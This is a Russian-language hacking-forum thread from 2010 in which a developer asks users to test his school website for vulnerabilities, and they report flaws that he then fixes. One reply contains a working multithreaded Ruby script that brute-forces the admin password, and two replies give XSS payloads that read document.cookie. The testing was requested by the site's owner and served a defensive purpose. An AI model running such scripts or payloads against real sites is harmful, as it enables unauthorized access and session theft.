ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Перезагрузить страницу Официальный сайт МОУСОШ п. Мичуринский
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Официальный сайт МОУСОШ п. Мичуринский
  #1  
Старый 29.03.2010, 20:08
Аватар для Кровавый
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
Провел на форуме:
30917

Репутация: 0
По умолчанию Официальный сайт МОУСОШ п. Мичуринский
Я сейчас разрабатываю сайт школы МОУСОШ п.Мичуринский.
Временный домен: http://schoolmich.edu.ru.orange.intobservatory.ru/
Работает на самописном движке (если это можно назвать движком).
Прошу проверить сайт на уязвимости.
Интересующие области: гостевая, админ-панель (http://schoolmich.edu.ru.orange.intobservatory.ru/admin/).

Спасибо!
 
Ответить с цитированием

  #2  
Старый 02.04.2010, 04:59
Аватар для Kamik
Kamik
Флудер
Регистрация: 02.12.2008
Сообщений: 4,294,967,295
Провел на форуме:
689466

Репутация: 155


Отправить сообщение для Kamik с помощью ICQ
По умолчанию
Проверка все еще идет так что по пути буду редактировать сообщение.

1. в гостевой книге в поле текст сообщения можно вставлять html код
 
Ответить с цитированием

  #3  
Старый 02.04.2010, 06:14
Аватар для lukmus
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429

Репутация: 214


По умолчанию
1.почему в админке не надо вводить логин - сразу минус
2.почему в админке пароль вводиться формой с методом GET - гигантский минус
какой-нить тип пробуртфорсит пароль и выложит где-нить ссылку и гугл проиндексирует админку, а может гугл и сам сможет подобрать пароль
3.почему нет ограничений на кол-ва ввода пароля, хотя бы какую-нить куку с попытками вводил или поля с рандомными именами.

и как следствие всего вышеупомянутого, многопоточный брутфорс под твою админку выглядит как HelloWorld!:
Код:
#!/usr/bin/ruby
require 'net/http'
th_count=50
for i in 0..100000 do
	while Thread.list.size>th_count do sleep(1) end
	Thread.new do
		http=Net::HTTP.new('schoolmich.edu.ru.orange.intobservatory.ru', 80)
		pass=i.to_s(36)
		path="/admin/admin.php?password=#{pass}&doGo=%C2%EE%E9%F2%E8"
		resp, data = http.get(path)
		if !(data.include?("<body bgcolor=\"red\">")) 
			puts "#{pass} SUCCESS"
			exit 
		end
		puts "#{pass} FAILED"
	end
end
 
Ответить с цитированием

  #4  
Старый 02.04.2010, 06:33
Аватар для lukmus
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429

Репутация: 214


По умолчанию
прошел по такой ссылке
Цитата:
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/showtopic.php?topic=430000000
заполнил форму и увидел это:
 
Ответить с цитированием

  #5  
Старый 02.04.2010, 06:47
Аватар для lukmus
lukmus
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429

Репутация: 214


По умолчанию
у тебя в самом коде страницы гостевой зашит ответ на капчу

Цитата:
...
document.add.text.value = b;
}

</script>

<form name="add" action='add.php?topic=100&test=43' method=post>
<table border=2 width=627 height=441 bgcolor=#9CBB8A>
<tr>
...
капча была:
Цитата:
Выполните действие: 24 + 19
 
Ответить с цитированием

  #6  
Старый 02.04.2010, 16:16
Аватар для Кровавый
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
Провел на форуме:
30917

Репутация: 0
По умолчанию
Ссори, что не ответил сразу. Был немного занят.
Итак:
1. Убрал всякие iframe, img и прочую ересь из поля text.
2. Страницу, с несуществующей темой вы больше не увидите.
3. В скрипте, отвечающем за добавление поста вы тоже больше не увидите раскрытия путей.
4. Над капчей поработал. Придётся посчитать немного, прежде чем её вытащить. Думаю куки ставить бесполезно, всё равно прочитаете.
5. Над админкой сейчас работаю.
 
Ответить с цитированием

  #7  
Старый 08.04.2010, 23:27
Аватар для Red_EYEs
Red_EYEs
Познающий
Регистрация: 07.08.2009
Сообщений: 36
Провел на форуме:
257153

Репутация: 34
По умолчанию
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/add.php?topic='%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Пассивка
 
Ответить с цитированием

  #8  
Старый 10.04.2010, 23:10
Аватар для Кровавый
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
Провел на форуме:
30917

Репутация: 0
По умолчанию
Цитата:
Сообщение от Red_EYEs  
http://schoolmich.edu.ru.orange.intobservatory.ru/guest/add.php?topic='%3C/script%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Пассивка
Спасибо. Исправлено.
 
Ответить с цитированием

  #9  
Старый 16.04.2010, 09:08
Аватар для Agel Nash
Agel Nash
Новичок
Регистрация: 23.07.2009
Сообщений: 5
Провел на форуме:
35408

Репутация: 3
По умолчанию
Гостевая. В поле "Сайт" пишм
Код:
http://ya.ru onmouseover=alert(document.cookie)
и получаем кукисы:-)
 
Ответить с цитированием

  #10  
Старый 18.04.2010, 00:16
Аватар для Кровавый
Кровавый
Новичок
Регистрация: 11.03.2010
Сообщений: 20
Провел на форуме:
30917

Репутация: 0
По умолчанию
Цитата:
Сообщение от Agel Nash  
Гостевая. В поле "Сайт" пишм
Код:
http://ya.ru onmouseover=alert(document.cookie)
и получаем кукисы:-)
Вроде исправил. Со второго раза.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Официальный сайт Московского метрополитена затроянили root_sashok Болталка 6 16.01.2010 14:49
Раскрутка сайта heks Статьи 15 15.02.2009 19:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ